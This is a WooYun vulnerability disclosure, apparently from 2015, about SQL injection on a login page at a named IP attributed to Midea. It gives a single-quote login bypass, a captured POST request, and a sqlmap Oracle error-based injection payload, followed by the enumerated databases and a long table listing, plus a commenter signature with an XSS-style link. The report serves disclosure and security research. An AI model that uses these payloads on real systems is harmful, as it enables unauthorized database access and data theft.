当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0123129

漏洞标题:美的某站Oracle注入(数据相当多)

相关厂商:midea.com

漏洞作者: DloveJ

提交时间:2015-06-27 22:53

修复时间:2015-08-11 23:32

公开时间:2015-08-11 23:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-06-27: 细节已通知厂商并且等待厂商处理中
2015-06-27: 厂商已经确认,细节仅向厂商公开
2015-07-07: 细节向核心白帽子及相关领域专家公开
2015-07-17: 细节向普通白帽子公开
2015-07-27: 细节向实习白帽子公开
2015-08-11: 细节向公众公开

简要描述:

美的???meide??

详细说明:

http://120.132.154.11:8080/web/rdlogin.jsp


0x00

admin'or'1'='1登陆

不过没什么用

1.jpg


0x01

登录入口抓包
POST /web/SubmitLogin.do HTTP/1.1
Host: 120.132.154.11:8080
Proxy-Connection: keep-alive
Content-Length: 125
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://120.132.154.11:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.81 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://120.132.154.11:8080/web/SubmitLogin.do
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: CPCUserName=test; ch1=true; ch2=false; lastloginuser=test; entcode=mdrd; JSESSIONID=6By6VT5B2qn4HhyPT4PlmTvqXLGhQ5xJkwJv324RTww2YYBHXqtd!-549272955
value%28entcode1%29=mdrd&value%28entcode%29=mdrd&value%28userName%29=test&value%28password%29=test&Submit=%E7%99%BB+%E5%BD%95



current schema (equivalent to database on Oracle):    'MDRD'
Place: POST
Parameter: value(userName)
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: value(entcode1)=mdrd&value(entcode)=mdrd&value(userName)=test' AND
8955=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(121)||CHR(109)||CHR(116)||CHR(5
8)||(SELECT (CASE WHEN (8955=8955) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(9
8)||CHR(107)||CHR(98)||CHR(58)||CHR(62))) FROM DUAL) AND 'uWtW'='uWtW&value(pass
word)=test&Submit=? ?


available databases [4]:
[*] ETWMAIL
[*] MDRD
[*] SYS
[*] SYSTEM


sqmlap已经超出了,就把现实的复制下吧

| CPCWFATTACH                    |
| CPCWFOBJ                       |
| CPCWFOBJTEMP                   |
| CPCWFPROC                      |
| CPCWFPROCH                     |
| CPCWFPROCNOTICE                |
| CPCWFPROCSIGN                  |
| CPCWFPROCSIGNTEMP              |
| CPCWFPROCTASK                  |
| CPCWFPROCTEMP                  |
| CPCWFPROCTEMPNOTICE            |
| CPCWFPROCTEMP_20100413         |
| CPCWFPROCTYPE                  |
| CPCWFPUBLISH                   |
| CPCWFPUBTEMP                   |
| CPCWFREF                       |
| CPCWFSHEET                     |
| CPCWFTEMP                      |
| CPCWFTEMPCROSS                 |
| CPCWFTEMPREF                   |
| CPCWFTEMPS                     |
| CPCWFUSERRANGE                 |
| CPCWORKLOG                     |
| CPCWORKPLAN                    |
| CPCWORKSPACE                   |
| CPCWORKTIME                    |
| CPCWORKTIMECFG                 |
| CPCWSENT                       |
| CPCWSOBJ                       |
| CPCWSREF                       |
| CPCWSREF20120317               |
| CPC_COLUMN                     |
| CPC_VENDOR                     |
| DELIVER_ADDRESS                |
| DELIVER_ADDRESS_CONSTRAINT     |
| DELIVER_ADDRESS_INTERFACE      |
| DELIVER_MESSAGE                |
| DELIVER_MESSAGE20130122        |
| DELIVER_MESSAGE_FORMERGE       |
| DELIVER_MESSAGE_H              |
| DELIVER_MESSAGE_HISTORY        |
| DELIVER_MESSAGE_INT            |
| DELIVER_MESSAGE_INT20121029    |
| DELIVER_MESSAGE_INTERFACE      |
| DELIVER_MESSAGE_INT_LOG        |
| DELIVER_MESSAGE_LOG            |
| DELIVER_MESSAGE_SURE_INTERFACE |
| DELIVER_MESSAGE_SURE_INT_LOG   |
| DELIVER_MESSAGE_TEST           |
| DELIVER_MI_20140422            |
| DELIVER_OUTBILL_HEAD_INTERFACE |
| DELIVER_OUTBILL_HEAD_INT_LOG   |
| DELIVER_OUTBILL_LINE_INTERFACE |
| DELIVER_OUTBILL_LINE_INT_LOG   |
| EBS_CPC_USER_RELATION          |
| FXH20110919                    |
| INNER_ITEM_ID20120314          |
| INTERFACECHECK                 |
| INTERFACESTATE                 |
| INTERFACEVENDOR                |
| INTERFACE_SYNCHRONIZED         |
| INTVARCHAR                     |
| INVOICENO_SURE_INTERFACE       |
| INVOICENO_SYN_INTERFACE        |
| INVOICE_BILL_HEAD_INTERFACE    |
| INVOICE_BILL_LINE_INTERFACE    |
| INVOICE_BILL_RECEIVE_INTERFACE |
| INVOICE_CREATE_HEAD_INTERFACE  |
| INVOICE_CREATE_LINE_INTERFACE  |
| INV_IN_BILL_HEAD               |
| INV_IN_BILL_HEAD_H             |
| INV_IN_BILL_LINE               |
| INV_IN_BILL_LINE_H             |
| INV_MONTHSUM                   |
| INV_OUT_BILL_HEAD              |
| INV_OUT_BILL_HEAD0929          |
| INV_OUT_BILL_HEAD120330        |
| INV_OUT_BILL_HEAD20110927      |
| INV_OUT_BILL_HEAD20120314      |
| INV_OUT_BILL_HEAD20120319      |
| INV_OUT_BILL_HEAD20120406      |
| INV_OUT_BILL_HEAD_FORMERGE     |
| INV_OUT_BILL_HEAD_H            |
| INV_OUT_BILL_HEAD_ID20120319   |
| INV_OUT_BILL_HEAD_LOG          |
| INV_OUT_BILL_LINE              |
| INV_OUT_BILL_LINE120330        |
| INV_OUT_BILL_LINE20120319      |
| INV_OUT_BILL_LINE_H            |
| INV_OUT_BILL_LINE_LOG          |
| INV_VENDOR_INV                 |
| INV_VENDOR_INV20110926         |
| INV_VENDOR_INV20110927         |
| INV_VENDOR_INV20120221DEL      |
| INV_VENDOR_INV_H               |
| INV_VENDOR_INV_INTERFACE       |
| ITEM                           |
| ITEM20120314                   |
| ITEM_20101018                  |
| ITEM_20111130                  |
| ITEM_20120315                  |
| ITEM_BIG_KIND                  |
| ITEM_H                         |
| ITEM_INTERFACE                 |
| ITEM_INTERFACE20120314         |
| ITEM_INTERFACE20120314_1       |
| ITEM_INTERFACE_20101018        |
| ITEM_INVENTORY                 |
| ITEM_KIND_USER_RELATION        |
| ITEM_ORG                       |
| ITEM_SUPPLY_RATE               |
| ITEM_SUPPLY_RATE20120314       |
| ITEM_SUPPLY_RATE_INTERFACE     |
| LOGINLOG                       |
| LOGINLOG_ALL_BAK               |
| LOGINLOG_ALL_BAK1              |
| MESSAGE_CLOSE_INTERFACE        |
| MESSAGE_CLOSE_INT_LOG          |
| MODIFY_BUSINESS_HISTORY        |
| NOTICE_READ_SYNCHRON_INTERFACE |
| NOTICE_SYNCHRON_ATTACH_INT     |
| NOTICE_SYNCHRON_INTERFACE      |
| OCKRESULT                      |
| OCKRESULT_INTERFACE            |
| ORDER_CHANGE_INTERFACE         |
| ORDER_CHANGE_INT_LOG           |
| ORDER_STATUS_SURE_INTERFACE    |
| ORDER_STATUS_SURE_INT_LOG      |
| ORDER_VENDOR_INFO              |
| ORDER_VENDOR_INFO_INTERFACE    |
| ORG_AREA                       |
| OUTBILL_DEAL_HEAD_INTERFACE    |
| OUTBILL_DEAL_HEAD_INT_LOG      |
| OUTBILL_DEAL_LINE_INTERFACE    |
| OUTBILL_DEAL_LINE_INT_LOG      |
| PRIVATE_TRADE                  |
| PURCHASE_INBILL_HEAD_INTERFACE |
| PURCHASE_INBILL_LINE_INTERFACE |
| PURCHASE_ORDER_HEAD            |
| PURCHASE_ORDER_HEAD_H          |
| PURCHASE_ORDER_HEAD_INTERFACE  |
| PURCHASE_ORDER_HEAD_INT_LOG    |
| PURCHASE_ORDER_LINE            |
| PURCHASE_ORDER_LINE_H          |
| PURCHASE_ORDER_LINE_INTERFACE  |
| PURCHASE_ORDER_LINE_INT_LOG    |
| PURCHASE_ORDER_PLAN            |
| QUESTION_TYPE                  |
| REQUEST_LEAD_BILL20111219      |
| REQUEST_LEAD_BILL2013311       |
| REQUEST_LEAD_BILL_HEAD         |
| REQUEST_LEAD_BILL_HEAD20110927 |
| REQUEST_LEAD_BILL_HEAD20110928 |
| REQUEST_LEAD_BILL_HEAD20111006 |
| REQUEST_LEAD_BILL_HEAD20111007 |
| REQUEST_LEAD_BILL_HEAD20111010 |
| REQUEST_LEAD_BILL_HEAD20111011 |
| REQUEST_LEAD_BILL_HEAD20111219 |
| REQUEST_LEAD_BILL_HEAD2012     |
| REQUEST_LEAD_BILL_HEAD20120227 |
| REQUEST_LEAD_BILL_HEAD20120314 |
| REQUEST_LEAD_BILL_HEAD20120427 |
| REQUEST_LEAD_BILL_HEAD_110811  |
| REQUEST_LEAD_BILL_HEAD_H       |
| REQUEST_LEAD_BILL_HEAD_LOG     |
| REQUEST_LEAD_BILL_LINE         |
| REQUEST_LEAD_BILL_LINE20110928 |
| REQUEST_LEAD_BILL_LINE20111006 |
| REQUEST_LEAD_BILL_LINE20111007 |
| REQUEST_LEAD_BILL_LINE20111010 |
| REQUEST_LEAD_BILL_LINE20120227 |
| REQUEST_LEAD_BILL_LINE20120427 |
| REQUEST_LEAD_BILL_LINE2021     |
| REQUEST_LEAD_BILL_LINE_H       |
| REQUEST_LEAD_BILL_LINE_LOG     |
| REQUEST_LEAD_HEAD_FORMERGE     |
| REQUEST_LEAD_HEAD_INTERFACE    |
| REQUEST_LEAD_LINE_INTERFACE    |
| RFI_ANSWER_CHOOSE_BANK         |
| RFI_ANSWER_CHOOSE_FILED        |
| RFI_ANSWER_JUDGE_MARKING       |
| RPTDS                          |
| RPTSP                          |
| RPTTABLE                       |
| SALE_BILL_PRICE_DIFF           |
| SALE_OUTBILL_HEAD_INTERFACE    |
| SALE_OUTBILL_LINE_INTERFACE    |
| SCM_INIT_VENDOR                |
| SCM_INIT_VENDOR20110929        |
| SCP_REQUEST_LEAD_HEAD_INT      |
| SCP_REQUEST_LEAD_HEAD_INT0625  |
| SCP_REQUEST_LEAD_LINE_INT      |
| SCP_STATEMENT_CUSTOMER_INT     |
| SCP_STATEMENT_CUSTOMER_INT0919 |
| SCP_STATEMENT_CUST_INT120314   |
| SCP_STATEMENT_HEAD_INT0919     |
| SCP_STATEMENT_HEAD_INTER120314 |
| SCP_STATEMENT_HEAD_INTERFACE   |
| SCP_STATEMENT_VENDOR_INT       |
| SCP_STATEMENT_VENDOR_INT0919   |
| SCP_STATEMENT_VENDOR_INT120314 |
| SCP_VEND_FORFEIT_INTERFACE     |
| SHIPMENTAREA20120316           |
| SHIPMENT_HEADER20120621        |
| SHIPMENT_HEADER2013311         |
| SHIPMENT_LINE20120621          |
| SP_LOG                         |
| STCPUPLOADFILELIST             |
| STCP_NEWDOCRECEIVE_LIB         |
| STCP_PS_BOM_INT                |
| STCP_PS_DOCSEND_INT            |
| STCP_PS_ECNDRAWLINE_INT        |
| STCP_PS_ECN_INT                |
| STCP_PS_ITEM_INT               |
| STCP_PS_SEND_SAMP_MESSAGE_INT  |
| STCP_PS_SEND_SAMP_MES_DR_INT   |
| STCP_SEND_SAMP_DRAWREL         |
| STCP_SEND_SAMP_HEAD            |
| STCP_SEND_SAMP_LINE            |
| STCP_SEND_SAMP_MESSAGE         |
| STCP_SEND_SAMP_MESSAGE_DRAWREL |
| STCP_SP_DOCSEND_FEEDBACK_INT   |
| STCP_SP_SEND_SAMP_DRAWREL_INT  |
| STCP_SP_SEND_SAMP_HEAD_INT     |
| STCP_SP_SEND_SAMP_LINE_INT     |
| STCP_SP_SEND_SAMP_MESSAGE_INT  |
| STCP_SP_SEND_SAMP_MES_DR_INT   |
| SUB_INV_SET                    |
| SUB_INV_SET_INTERFACE          |
| SYS_TEMP_FBT                   |
| TEMP20140902ZRL                |
| TEMP20150323ZRL1               |
| TENANT_CUSTOMER                |
| TENANT_CUSTOMER_ROLE           |
| TMP_AP_STATEMENT_C_LINE        |
| TMP_AP_STATEMENT_HEAD          |
| TMP_AP_STATEMENT_V_LINE        |
| TMP_DELIVER_MESSAGE_04         |
| TMP_INIT_VENDOR                |
| TMP_INVBILL_1111               |
| TMP_INV_OUT_BILL_HEAD          |
| TMP_INV_OUT_BILL_HEAD1205      |
| TMP_INV_OUT_BILL_LINE          |
| TMP_INV_OUT_BILL_LINE1205      |
| TMP_INV_VENDOR_INV             |
| TMP_MESSAGE                    |
| TMP_QITONG                     |
| TMP_REQUEST_LEAD_BILL20110929  |
| TMP_REQUEST_LEAD_BILL_HEAD     |
| TMP_REQUEST_LEAD_BILL_HEAD1205 |
| TMP_REQUEST_LEAD_BILL_LINE     |
| TMP_REQUEST_LEAD_BILL_LINE1205 |
| TMP_SERPC                      |
| TMP_SHIPMENT_HEAD20110929      |
| TMP_SHIPMENT_HEADER            |
| TMP_SHIPMENT_LINE              |
| TMP_TABLE                      |
| TMP_VENDOR1008                 |
| TMP_VENDOR100801               |
| TMP_ZZH_3_2                    |
| TRADE_INFO                     |
| TREETEST                       |
| UOM                            |
| USER_ACCESS_20110928           |
| USER_ACCESS_RELATION           |
| USER_ACCESS_RELATION0928       |
| USER_ACCESS_RELATION20110928   |
| USER_AUTHENTICATE              |
| USER_INFO                      |
| USER_INFO20110927              |
| USER_INFO20110928              |
| USER_INFO_XL                   |
| USPTOTEST1                     |
| VARFACECHECK                   |
| VAT_REGI20110927               |
| VENDORLOC                      |
| VENDOR_INTERFACE               |
| VENDOR_INTERFACE20110927       |
| VENDOR_LIMIT_AMOUNT20120317    |
| VENDOR_LIMIT_AMOUNT20120321    |
| VENDOR_SITE                    |
| VENDOR_SITE0920                |
| VENDOR_SITE0928                |
| VENDOR_SITEDEL20110921         |
| VENDOR_SITE_INTERFACE          |
| WEBSERVICEMSG                  |
| WEBSERVICEMSG20120316          |
| WEBSERVICEMSG_LOG              |
| WEBSERVICE_INFO                |
| WEB_DATA_FIELD_MAPPING         |
| WEB_DATA_TRANSFER_CONFIG       |
| WIP_BK_CLASS                   |
+--------------------------------+


漏洞证明:

2.jpg

3.jpg

修复方案:

版权声明:转载请注明来源 DloveJ@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2015-06-27 23:31

厂商回复:

感谢@DloveJ的提醒,目前我们正在确认漏洞信息。

最新状态:

暂无

漏洞评价:

评论

  1. 2015-06-28 10:34 | 0x 80 ( 普通白帽子 | Rank:1301 漏洞数:398 | 某安全公司招聘系统运维、渗透测试、安全运...)

    你是不是只得了一个rank

  2. 2015-06-28 10:37 | DloveJ ( 普通白帽子 | Rank:1107 漏洞数:200 | <a href=javascrip:alert('xss')>s</a> 点...)

    @0x 80 是的

  3. 2015-06-28 10:40 | 0x 80 ( 普通白帽子 | Rank:1301 漏洞数:398 | 某安全公司招聘系统运维、渗透测试、安全运...)

    这么坑。。注入才1个币

  4. 2015-06-28 10:46 | DloveJ ( 普通白帽子 | Rank:1107 漏洞数:200 | <a href=javascrip:alert('xss')>s</a> 点...)

    @0x 80 厂商略坑...

  5. 2015-07-17 23:51 | 0x 80 ( 普通白帽子 | Rank:1301 漏洞数:398 | 某安全公司招聘系统运维、渗透测试、安全运...)

    太坑啦

  6. 2015-08-25 09:12 | 美的集团(乌云厂商)

    @DloveJ @0x 80 @DloveJ @0x 80 @DloveJ @0x 80 @DloveJ @0x 80 @DloveJ @0x 80 @DloveJ @0x 80 不坑了,这系统不是美的自己的系统。是开发商自己的测试环境。